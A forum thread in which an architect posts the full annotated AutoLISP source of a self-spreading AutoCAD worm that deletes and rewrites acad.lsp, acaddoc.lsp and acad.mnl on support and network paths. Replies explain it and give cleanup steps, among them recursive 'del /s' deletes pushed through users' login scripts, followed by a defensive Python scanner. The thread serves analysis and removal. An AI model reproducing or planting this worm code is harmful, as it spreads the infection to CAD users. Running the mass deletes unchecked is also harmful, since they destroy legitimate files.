Debugging what this LISP virus is doing
My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp
with the routine below.
I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes".
Questions
- What is this replacing the files with (currently searching for acadapq)?
- Who writes a virus for AutoCAD?!?!
Has anyone seen this before? The CAD forums aren't very helpful.
;; Save the current command-echo setting and switch echo off so nothing shows on the command line
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)                                           ; "version" digit of this copy, compared below
(setq dpath (getvar "dwgprefix"))                     ; folder of the drawing being opened
(setq wpath (getvar "menuname"))                      ; path of the loaded menu file, without extension
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))   ; strip the trailing "acad" to get the support folder
;; Delete every acad.fas, lcm.fas and acad.lsp that findfile locates on the support path;
;; each loop only ends once findfile no longer finds the file (n is set to 2)
(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
    (if (vl-file-delete (findfile "acad.fas"))
      (setq n 0))
    (setq n 2)))
(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
    (if (vl-file-delete (findfile "lcm.fas"))
      (setq n 0))
    (setq n 2)))
(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
    (if (vl-file-delete (findfile "acad.lsp"))
      (setq n 0))
    (setq n 2)))
;; Copy woldacad line by line into wnewacad, overwriting the target file
(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
    (progn
      (setq wwjm (open woldacad "r"))
      (while (setq wwz (read-line wwjm))
        (write-line wwz wwjm1))
      (close wwjm)
      (close wwjm1))))
;; Read the digit at column 4 of line 4 of the drawing folder's acaddoc.lsp and of the
;; support folder's acad.mnl; lbz becomes 1 when the support copy is missing or older
(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 3 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq ab (atoi (substr wz 4 1)))
    (close wwjm)
    (if (> ab bb)
      (setq lbz 1))))
(setq wwjqm (strcat wpath "acad.mnl"))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 3 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq nb (atoi (substr wz 4 1)))
    (close wwjm)
    (if (< nb bb)
      (setq lbz 1)))
  (setq lbz 1))
;; Overwrite the support folder's acad.mnl with the drawing folder's acaddoc.lsp
(if (= lbz 1)
  (progn
    (setq woldacad (strcat dpath "acaddoc.lsp"))
    (setq wnewacad (strcat wpath "acad.mnl"))
    (wwriteapp)))
;; If the drawing is not on drive C, D, E or F (chr 67..70, i.e. a network or other drive),
;; write acad.mnl into the drawing folder as acaddoc.lsp; on a local drive delete that file instead
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
  (progn
    (setq woldacad (strcat wpath "acad.mnl"))
    (setq wnewacad (strcat dpath "acaddoc.lsp"))
    (wwriteapp))
  (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
;; Restore the original command-echo setting
(setvar "cmdecho" wold_cmd)
Comments (3)
It is doing a support file path walk, delete and replace of the common AutoCAD customization files ("acad.fas", "acad.lsp", "acaddoc.lsp"). I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product, i.e. AutoCAD Mechanical or Architectural Desktop?
The looping is essentially "while I keep finding on the support path delete it".
So far as I know AutoCAD has no built in defense against this. (There may be some acad system var that stops execution of these files).
The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. Turns it off while running (so you don't notice) then restores the original setting.
A polite virus :\
When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on its support path. Every time AutoCAD loads a new .dwg it executes the "acaddoc.lsp".
Follow these steps to get rid of this worm:
Manually
Copy the attached routine on your PC: acaddocfix_1.6.lsp
Load the lisp file using APPLOAD command
The lisp file will run automatically and it will clean all the existences of the worm in your support folders.
While there is another way: we can do it as a batch file by adding it so it runs once any user starts his/her PC, as I checked with IT before.
Auto run
Run an antivirus or a cleaner to get rid of "acaddoc.lsp" files. Normally the cleaner routine installs a simple routine in your acad20XXdoc.lsp file which automatically cleans those files, but I recommend cleaning all the viruses with an anti-virus first.
You can also run the -acaddoc.bat DOS batch file to clean all your drives manually.
Run this batch once and it will delete all acaddoc.lsp files on your system.
NOTE: If any of the infected files in your Autocad Support folders are READONLY the cleaner won’t be able to clean those files !!
Kindly refer to http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/
The wild thing is that the lisp file only gets created when the files are opened on the network, local copies don't seem to have this issue.
Add del /s acaddoc.lsp and del /s acad.lsp to all users' login scripts and run this for a week or so, and it should get rid of all the acaddoc.lsp and acad.lsp files which the virus comes in. Make sure you do not actually use any of these files for your own purpose, though, before running the delete command.
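As an added example (not code from any of the answers above, nor the attached acaddocfix routine), here is a Python scanner that walks a drawing or support tree, reports every file name the posted routine touches, distinguishes copies carrying the routine's telltale names (wwriteapp, acadapq) from a user's own acad.lsp, and marks read-only copies that the cleaners described above cannot remove. The file-name list comes from the posted routine; the signature choice and the sample tree it builds are assumptions constructed for the demonstration.

```python
import os
import stat
import tempfile
from dataclasses import dataclass

# File names the posted routine reads, writes or deletes.
WORM_FILENAMES = {"acaddoc.lsp", "acad.lsp", "acad.mnl", "acad.fas", "lcm.fas"}

@dataclass
class Finding:
    path: str        # relative to the scanned root, forward slashes
    infected: bool   # content carries the routine's telltale names
    read_only: bool  # no owner write bit: a cleaner cannot overwrite or delete it

def classify_file(root: str, path: str) -> Finding:
    # .fas files are compiled binaries, so decode errors are ignored rather than fatal
    try:
        with open(path, "r", errors="ignore") as fh:
            text = fh.read()
    except OSError:
        text = ""
    # Both worm-specific names must be present; vl-file-delete alone is ordinary AutoLISP
    infected = "wwriteapp" in text and "acadapq" in text
    read_only = not (os.stat(path).st_mode & stat.S_IWUSR)
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    return Finding(rel, infected, read_only)

def scan_tree(root: str) -> list:
    # Walk the whole tree and report every worm-related file name, sorted for stable output
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in WORM_FILENAMES:
                findings.append(classify_file(root, os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: f.path)

# Constructed sample tree (assumed, not real infected files): one stand-in carrying only the
# telltale names, one legitimate user acad.lsp, and one read-only copy in the support folder.
SAMPLE_WORM = '(defun wwriteapp () nil)\n;load "acadapq")\n'
SAMPLE_LEGIT = '(defun c:hello () (princ "hello"))\n'

def build_sample_tree() -> str:
    root = tempfile.mkdtemp(prefix="acad_scan_")
    for rel, body, read_only in (("projects/jobA/acaddoc.lsp", SAMPLE_WORM, False),
                                 ("support/acad.lsp", SAMPLE_LEGIT, False),
                                 ("support/acad.mnl", SAMPLE_WORM, True)):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        if read_only:  # the case the NOTE above warns about: a cleaner will skip this copy
            os.chmod(path, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
    return root
```

Run scan_tree on a real drawing share or support folder instead of build_sample_tree(); a Finding with read_only set must have the attribute cleared before any cleaner or login-script delete will succeed on it.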